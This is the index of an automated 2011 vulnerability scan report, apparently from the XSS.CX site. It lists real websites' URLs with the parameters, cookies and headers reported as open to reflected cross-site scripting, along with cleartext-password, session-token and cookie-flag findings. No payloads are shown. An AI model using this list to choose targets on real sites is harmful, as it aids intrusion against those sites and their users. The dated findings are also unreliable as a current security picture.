XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 08152011-01

Report generated by XSS.CX at Mon Aug 15 13:25:29 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

1.1. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [AdID parameter]

1.2. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [AdID parameter]

1.3. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [FlightID parameter]

1.4. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [FlightID parameter]

1.5. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [Redirect parameter]

1.6. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [Redirect parameter]

1.7. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [TargetID parameter]

1.8. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [TargetID parameter]

1.9. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [Values parameter]

1.10. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [Values parameter]

1.11. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [sz parameter]

1.12. http://ad.doubleclick.net/adj/N815.cnnmoney/B5583854.30 [sz parameter]

1.13. http://ad.turn.com/server/pixel.htm [fpid parameter]

1.14. http://ad.turn.com/server/pixel.htm [sp parameter]

1.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [AdID parameter]

1.16. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [FlightID parameter]

1.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [Redirect parameter]

1.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [Segments parameter]

1.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [TargetID parameter]

1.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [Values parameter]

1.21. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [click parameter]

1.22. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [name of an arbitrarily supplied request parameter]

1.23. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

1.24. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

1.25. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

1.26. http://api.bizographics.com/v1/profile.json [&callback parameter]

1.27. http://api.bizographics.com/v1/profile.json [api_key parameter]

1.28. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358 [REST URL parameter 3]

1.29. http://banners.bookofsex.com/go/page/iframe_cm_26400 [REST URL parameter 3]

1.30. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js [$ parameter]

1.31. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js [$ parameter]

1.32. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js [q parameter]

1.33. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js [q parameter]

1.34. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js [$ parameter]

1.35. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js [$ parameter]

1.36. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js [q parameter]

1.37. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js [q parameter]

1.38. http://choices.truste.com/ca [c parameter]

1.39. http://choices.truste.com/ca [cid parameter]

1.40. http://choices.truste.com/ca [iplc parameter]

1.41. http://choices.truste.com/ca [plc parameter]

1.42. http://choices.truste.com/ca [zi parameter]

1.43. http://count36.51yes.com/click.aspx [id parameter]

1.44. http://count36.51yes.com/click.aspx [logo parameter]

1.45. http://js.revsci.net/gateway/gw.js [csid parameter]

1.46. http://newspulse.cnn.com/widget/json/social [callback parameter]

1.47. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

1.48. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

1.49. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

1.50. http://syndication.exoclick.com/ads-iframe-display.php [bgcolor parameter]

1.51. http://syndication.exoclick.com/ads-iframe-display.php [font parameter]

1.52. http://v2.tudou.com/tdct/commonadv.html [jsoncallback parameter]

1.53. http://www.ask.com/news [q parameter]

1.54. http://www.ask.com/news [q parameter]

1.55. http://www.ask.com/pictures [q parameter]

1.56. http://www.ask.com/pictures [q parameter]

1.57. http://www.linkedin.com/countserv/count/share [url parameter]

1.58. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp [source parameter]

1.59. http://xhamster.com/signup.php [city parameter]

1.60. http://xhamster.com/signup.php [email parameter]

1.61. http://xhamster.com/signup.php [name of an arbitrarily supplied request parameter]

1.62. http://xhamster.com/signup.php [next parameter]

1.63. http://xhamster.com/signup.php [next parameter]

1.64. http://xhamster.com/signup.php [next parameter]

1.65. http://xhamster.com/signup.php [prev parameter]

1.66. http://xhamster.com/signup.php [username parameter]

1.67. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

1.68. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358 [Referer HTTP header]

1.69. http://banners.bookofsex.com/go/page/iframe_cm_26400 [Referer HTTP header]

1.70. http://pop6.com/p/memsearch.cgi [Referer HTTP header]

1.71. http://ads.cnn.com/html.ng/site=cnn&cnn_pagetype=main&cnn_position=120x90_bot1&cnn_rollup=homepage&page.allowcompete=yes¶ms.styles=fs&transactionID=1604588547342336&tile=392593343132&domId=972525 [NGUserID cookie]

1.72. http://ads.cnn.com/html.ng/site=cnn&cnn_pagetype=main&cnn_position=126x31_spon2&cnn_rollup=homepage&page.allowcompete=yes¶ms.styles=fs&transactionID=1604588547342336&tile=392593343133&domId=135492 [NGUserID cookie]

1.73. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_pagetype=social_sync&cnn_money_position=620x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting¶ms.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=61790 [NGUserID cookie]

1.74. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_position=88x31_spon&cnn_money_rollup=homepage&cnn_money_section=fortune&cnn_money_subsection=marketgraph¶ms.styles=fs&domId=177939&page.allowcompete=yes&domId=177939 [NGUserID cookie]

1.75. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=136756 [NGUserID cookie]

1.76. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=136756 [NGUserID cookie]

1.77. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434106153&page.allowcompete=yes&domId=528442 [NGUserID cookie]

1.78. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo¶ms.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=260693 [NGUserID cookie]

1.79. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=main&cnn_money_position=336x280_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&cnn_money_subsection=homepage¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=637773 [NGUserID cookie]

1.80. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=social_sync&cnn_money_position=475x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting¶ms.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=480339 [NGUserID cookie]

1.81. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=698354 [NGUserID cookie]

1.82. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo¶ms.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274 [NGUserID cookie]

1.83. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014106&page.allowcompete=yes&domId=644255 [NGUserID cookie]

1.84. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=technology¶ms.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=919796 [NGUserID cookie]

1.85. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=technology¶ms.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=696470 [NGUserID cookie]

1.86. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105 [NGUserID cookie]

1.87. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105 [NGUserID cookie]

1.88. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105 [NGUserID cookie]

1.89. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962 [NGUserID cookie]

1.90. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=726845 [NGUserID cookie]

1.91. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=773777 [NGUserID cookie]

1.92. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=78541 [NGUserID cookie]

1.93. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot¶ms.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=229469 [NGUserID cookie]

1.94. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot¶ms.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=229469 [NGUserID cookie]

1.95. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot¶ms.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=229469 [NGUserID cookie]

1.96. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=business_news¶ms.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=84066 [NGUserID cookie]

1.97. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=markets_and_stocks¶ms.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=506627 [NGUserID cookie]

1.98. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=technology¶ms.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=411857 [NGUserID cookie]

1.99. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo¶ms.styles=fs&domId=566446&page.allowcompete=yes&domId=566446 [NGUserID cookie]

1.100. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072 [NGUserID cookie]

1.101. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=314x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular¶ms.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=383053 [NGUserID cookie]

1.102. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon1&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=845472 [NGUserID cookie]

1.103. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon2&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=399898 [NGUserID cookie]

1.104. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=284939 [NGUserID cookie]

1.105. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon4&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=812248 [NGUserID cookie]

1.106. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon5&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=758067 [NGUserID cookie]

1.107. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon6&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=401091 [NGUserID cookie]

1.108. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=475x60_mid&cnn_money_rollup=markets_and_stocks&cnn_money_section=social_media&cnn_money_subsection=commenting¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=113981 [NGUserID cookie]

1.109. http://www.ask.com/about/help [cu.wz cookie]

1.110. http://www.ask.com/about/help/webmasters [cu.wz cookie]

1.111. http://www.ask.com/about/legal/ask-site-policies [cu.wz cookie]

1.112. http://www.ask.com/about/legal/privacy [cu.wz cookie]

1.113. http://www.ask.com/news [cu.wz cookie]

1.114. http://www.ask.com/news [cu.wz cookie]

1.115. http://www.ask.com/pictures [cu.wz cookie]

1.116. http://www.ask.com/pictures [cu.wz cookie]

1.117. http://www.ask.com/products/display [cu.wz cookie]

1.118. http://www.ask.com/settings [cu.wz cookie]

1.119. http://www.ask.com/settings [cu.wz cookie]

1.120. http://www.ask.com/web [cu.wz cookie]

1.121. http://www.ask.com/web [cu.wz cookie]

1.122. http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp [B2CSESSIONID cookie]

2. Flash cross-domain policy

2.1. http://at-img2.tdimg.com/crossdomain.xml

2.2. http://at-img3.tdimg.com/crossdomain.xml

2.3. http://at-img4.tdimg.com/crossdomain.xml

2.4. http://stat.tudou.com/crossdomain.xml

2.5. http://www.xhamstercams.com/crossdomain.xml

2.6. http://xhamster.com/crossdomain.xml

3. Cleartext submission of password

3.1. http://js.mail.sohu.com/passport/pi18030.201011300952.js

3.2. http://www.ask.com/settings

3.3. http://www.mediafire.com/

3.4. http://www.mediafire.com/

3.5. http://www.mediafire.com/

3.6. http://www.mediafire.com/

3.7. http://www.mediafire.com/

3.8. http://www.mediafire.com/

3.9. http://www.tudou.com/

3.10. http://www.xhamstercams.com/cam/Juicy_Jules19/

3.11. http://xhamster.com/

3.12. http://xhamster.com/login.php

3.13. http://xhamster.com/signup.php

3.14. http://xhamster.com/signup.php

4. XML injection

5. Session token in URL

5.1. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358

5.2. http://banners.bookofsex.com/go/page/iframe_cm_26400

5.3. http://glean.pop6.com/images/common/glean.gif

5.4. http://l.sharethis.com/pview

5.5. http://pop6.com/p/memsearch.cgi

5.6. http://sales.liveperson.net/hc/76226072/

5.7. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif

5.8. http://www.facebook.com/extern/login_status.php

5.9. http://www.google.com/recaptcha/api/challenge

5.10. https://www.redhat.com/wapps/ugc/register.html

5.11. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp

5.12. http://www.wireless.att.com/cell-phone-service/packages/netbook-packages.jsp

5.13. http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp

6. Password field submitted using GET method

6.1. http://www.ask.com/settings

6.2. http://xhamster.com/

7. Open redirection

8. Cookie without HttpOnly flag set

8.1. http://afe.specificclick.net/

8.2. http://afe.specificclick.net/serve/v=5

8.3. https://www.redhat.com/wapps/sso/login.html

8.4. https://www.redhat.com/wapps/store/gwt/com.redhat.www.store.gwt.CheckoutClient/985A97185B87D4EFB4466AD39FCBC09F.cache.htm

8.5. https://www.redhat.com/wapps/store/protected/purchase.html

8.6. http://a.tribalfusion.com/j.ad

8.7. http://a2.mediagra.com/b.php

8.8. http://a5.mediagra.com/b.php

8.9. http://ad.turn.com/server/pixel.htm

8.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313433976**

8.11. http://ad.yieldmanager.com/pixel

8.12. http://ads.cnn.com/js.ng/site=cnn&cnn_pagetype=main&cnn_position=BG_Skin&cnn_rollup=homepage&page.allowcompete=no&tile=0392593343131&transactionID=1604588547342336

8.13. http://ak1.abmr.net/is/www.att.com

8.14. http://ak1.abmr.net/is/www.wireless.att.com

8.15. http://akamai.mathtag.com/sync/img

8.16. http://api.bizographics.com/v1/profile.json

8.17. http://ar.voicefive.com/b/recruitBeacon.pli

8.18. http://b.scorecardresearch.com/b

8.19. http://b.scorecardresearch.com/p

8.20. http://b.scorecardresearch.com/r

8.21. http://b.voicefive.com/p

8.22. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358

8.23. http://banners.bookofsex.com/go/page/iframe_cm_26400

8.24. http://bpx.a9.com/ads/getad

8.25. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js

8.26. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js

8.27. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzA0NzA4OQ

8.28. http://d7.zedo.com/img/bh.gif

8.29. http://g.ca.bid.invitemedia.com/pubm_imp

8.30. http://gdyn.cnn.com/1.1/1.gif

8.31. http://hire.jobvite.com/CompanyJobs/Careers.aspx

8.32. http://hire.jobvite.com/CompanyJobs/careers_1.css

8.33. http://hire.jobvite.com/CompanyJobs/careers_8.js

8.34. http://i.w55c.net/ping_match.gif

8.35. http://idpix.media6degrees.com/orbserv/hbpix

8.36. http://image2.pubmatic.com/AdServer/Pug

8.37. http://image2.pubmatic.com/AdServer/Pug

8.38. http://js.revsci.net/gateway/gw.js

8.39. http://markets.money.cnn.com/services/api/quotehover/

8.40. http://medleyads.com/mad_history

8.41. http://medleyads.com/spot_history

8.42. http://phoenix.untd.com/TRCK/RGST

8.43. http://ping.crowdscience.com/ping.js

8.44. http://pix04.revsci.net/A09801/b3/0/3/1008211/65654042.js

8.45. http://pix04.revsci.net/D08734/a1/0/0/0.gif

8.46. http://pix04.revsci.net/H07710/b3/0/3/1008211/160487930.js

8.47. http://pix04.revsci.net/H07710/b3/0/3/1008211/784372322.js

8.48. http://pix04.revsci.net/H07710/b3/0/3/1008211/886893878.js

8.49. http://pixel.rubiconproject.com/tap.php

8.50. http://pop6.com/p/memsearch.cgi

8.51. http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662

8.52. http://r1-ads.ace.advertising.com/site=789981/size=728090/u=2/bnum=73612408/hr=13/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.imdb.com%252Fimages%252FSF99c7f777fc74f1d954417f99b985a4af%252Fa%252Fifb%252Fdoubleclick%252Fexpand.html

8.53. http://sales.liveperson.net/hc/76226072/

8.54. http://sales.liveperson.net/hc/76226072/

8.55. http://segment-pixel.invitemedia.com/set_partner_uid

8.56. http://showadsak.pubmatic.com/AdServer/AdServerServlet

8.57. http://showadsak.pubmatic.com/AdServer/AdServerServlet

8.58. http://showadsak.pubmatic.com/AdServer/AdServerServlet

8.59. http://showadsak.pubmatic.com/AdServer/AdServerServlet

8.60. http://streamate.doublepimp.com/r.poptracking

8.61. http://sync.mathtag.com/sync/img

8.62. http://t.mookie1.com/t/v1/imp

8.63. http://tags.bluekai.com/site/2736

8.64. http://tags.bluekai.com/site/2751

8.65. http://txt.go.sohu.com/ip/soip

8.66. http://user.lucidmedia.com/clicksense/user

8.67. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif

8.68. http://www.ask.com/about/help

8.69. http://www.ask.com/about/help/webmasters

8.70. http://www.ask.com/about/legal/ask-site-policies

8.71. http://www.ask.com/about/legal/privacy

8.72. http://www.ask.com/news

8.73. http://www.ask.com/pictures

8.74. http://www.ask.com/products/display

8.75. http://www.ask.com/settings

8.76. http://www.ask.com/staticcontent/about/helpcenter/about_helpcenter_helpcenter

8.77. http://www.ask.com/staticcontent/about/helpcenter/about_helpcenter_webmaster

8.78. http://www.ask.com/staticcontent/about/legal/about_legal_notices

8.79. http://www.ask.com/web

8.80. http://www.att.com/global/images/priceLine_bg.gif

8.81. http://www.att.com/homepage/sitemap/

8.82. http://www.bizographics.com/collect/

8.83. http://www.cnn.com/

8.84. http://www.cnn.com/.element/img/3.0/1px.gif

8.85. http://www.cnn.com/.element/ssi/auto/3.0/sect/MAIN/facebook_rec.wrapper.html

8.86. http://www.cnn.com/.element/ssi/misc/3.0/editionvars.html

8.87. http://www.cnn.com/.element/ssi/www/breaking_news/3.0/banner.html

8.88. http://www.cnn.com/cnn_adspaces/3.0/homepage/main/bot1.120x90.ad

8.89. http://www.cnn.com/cnn_adspaces/3.0/homepage/spon2.126x31.ad

8.90. http://www.cnn.com/favicon.ie9.ico

8.91. http://www.cnn.com/tools/search/cnncom.xml

8.92. http://www.facebook.com/ConanTheBarbarian

8.93. http://www.facebook.com/home.php

8.94. http://www.facebook.com/login.php

8.95. http://www.facebook.com/media/set/

8.96. http://www.flickr.com/flanal_event.gne

8.97. http://www.imdb.com/

8.98. http://www.imdb.com/tv/widget/grid

8.99. http://www.wireless.att.com//store_maintenance/images/att_logo.gif

8.100. http://www.wireless.att.com//store_maintenance/images/globemaintenance.gif

8.101. http://www.wireless.att.com//store_maintenance/images/page_midSlice.gif

8.102. http://www.wireless.att.com//store_maintenance/images/page_topSlice.gif

8.103. http://www.wireless.att.com/cell-phone-service/legal/return-policy.jsp

8.104. http://www.wireless.att.com/cell-phone-service/packages/N

8.105. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp

8.106. http://www.wireless.att.com/cell-phone-service/packages/netbook-packages.jsp

8.107. http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp

8.108. http://www.wireless.att.com/global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s

8.109. http://www.wireless.att.com/store_maintenance/images/globemaintenance.gif

8.110. http://www.wireless.att.com/store_maintenance/images/page_btmSlice.gif

8.111. http://www.wireless.att.com/store_maintenance/images/page_midSlice.gif

8.112. http://www.xhamstercams.com/cam/Juicy_Jules19/

8.113. http://wzus1.ask.com/i/i.gif

9. Password field with autocomplete enabled

9.1. http://pop6.com/p/memsearch.cgi

9.2. http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662

9.3. http://www.ask.com/settings

9.4. http://www.facebook.com/ConanTheBarbarian

9.5. http://www.facebook.com/login.php

9.6. http://www.facebook.com/media/set/

9.7. http://www.mediafire.com/

9.8. http://www.mediafire.com/

9.9. http://www.mediafire.com/

9.10. http://www.mediafire.com/

9.11. http://www.mediafire.com/

9.12. https://www.redhat.com/wapps/sso/login.html

9.13. https://www.redhat.com/wapps/ugc/register.html

9.14. http://www.tudou.com/

9.15. http://www.xhamstercams.com/cam/Juicy_Jules19/

9.16. http://xhamster.com/

9.17. http://xhamster.com/login.php

9.18. http://xhamster.com/signup.php

9.19. http://xhamster.com/signup.php

9.20. http://xhamster.com/signup.php

9.21. http://xhamster.com/signup.php

10. Source code disclosure

10.1. http://content.pop6.com/banners/aff/35057/120x160/120x160_Dayss.flv

10.2. http://content.pop6.com/banners/aff/35057_R/120x160/120x160_Masami.flv

10.3. http://content.pop6.com/banners/aff/35057_R/120x160/120x160_marry.flv

10.4. http://js.tudouui.com/js/fn/saleloader_71.js

10.5. http://js.tudouui.com/js/fn/tuidefer_32.js

10.6. http://js.tudouui.com/js/lib/tuilib_83.js

10.7. http://js.tudouui.com/js/page/index/v2/userInfo_11.js

10.8. http://platform.linkedin.com/js/nonSecureAnonymousFramework

10.9. http://www.tudou.com/

10.10. http://www.wireless.att.com/global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s

11. Cross-domain POST

11.1. http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm

11.2. http://pop6.com/p/memsearch.cgi

12. Cookie scoped to parent domain

12.1. http://a.tribalfusion.com/j.ad

12.2. http://ad.turn.com/server/pixel.htm

12.3. http://ak1.abmr.net/is/www.att.com

12.4. http://ak1.abmr.net/is/www.wireless.att.com

12.5. http://akamai.mathtag.com/sync/img

12.6. http://api.bizographics.com/v1/profile.json

12.7. http://ar.voicefive.com/b/recruitBeacon.pli

12.8. http://b.scorecardresearch.com/b

12.9. http://b.scorecardresearch.com/p

12.10. http://b.scorecardresearch.com/r

12.11. http://b.voicefive.com/p

12.12. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358

12.13. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js

12.14. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js

12.15. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzA0NzA4OQ

12.16. http://d7.zedo.com/img/bh.gif

12.17. http://g.ca.bid.invitemedia.com/pubm_imp

12.18. http://gdyn.cnn.com/1.1/1.gif

12.19. http://i.w55c.net/ping_match.gif

12.20. http://ib.adnxs.com/getuidnb

12.21. http://ib.adnxs.com/seg

12.22. http://idpix.media6degrees.com/orbserv/hbpix

12.23. http://image2.pubmatic.com/AdServer/Pug

12.24. http://image2.pubmatic.com/AdServer/Pug

12.25. http://js.revsci.net/gateway/gw.js

12.26. http://phoenix.untd.com/TRCK/RGST

12.27. http://ping.crowdscience.com/ping.js

12.28. http://pix04.revsci.net/A09801/b3/0/3/1008211/65654042.js

12.29. http://pix04.revsci.net/D08734/a1/0/0/0.gif

12.30. http://pix04.revsci.net/H07710/b3/0/3/1008211/160487930.js

12.31. http://pix04.revsci.net/H07710/b3/0/3/1008211/784372322.js

12.32. http://pix04.revsci.net/H07710/b3/0/3/1008211/886893878.js

12.33. http://pixel.rubiconproject.com/tap.php

12.34. http://pt-br.facebook.com/ajax/captcha/recaptcha_log_actions.php

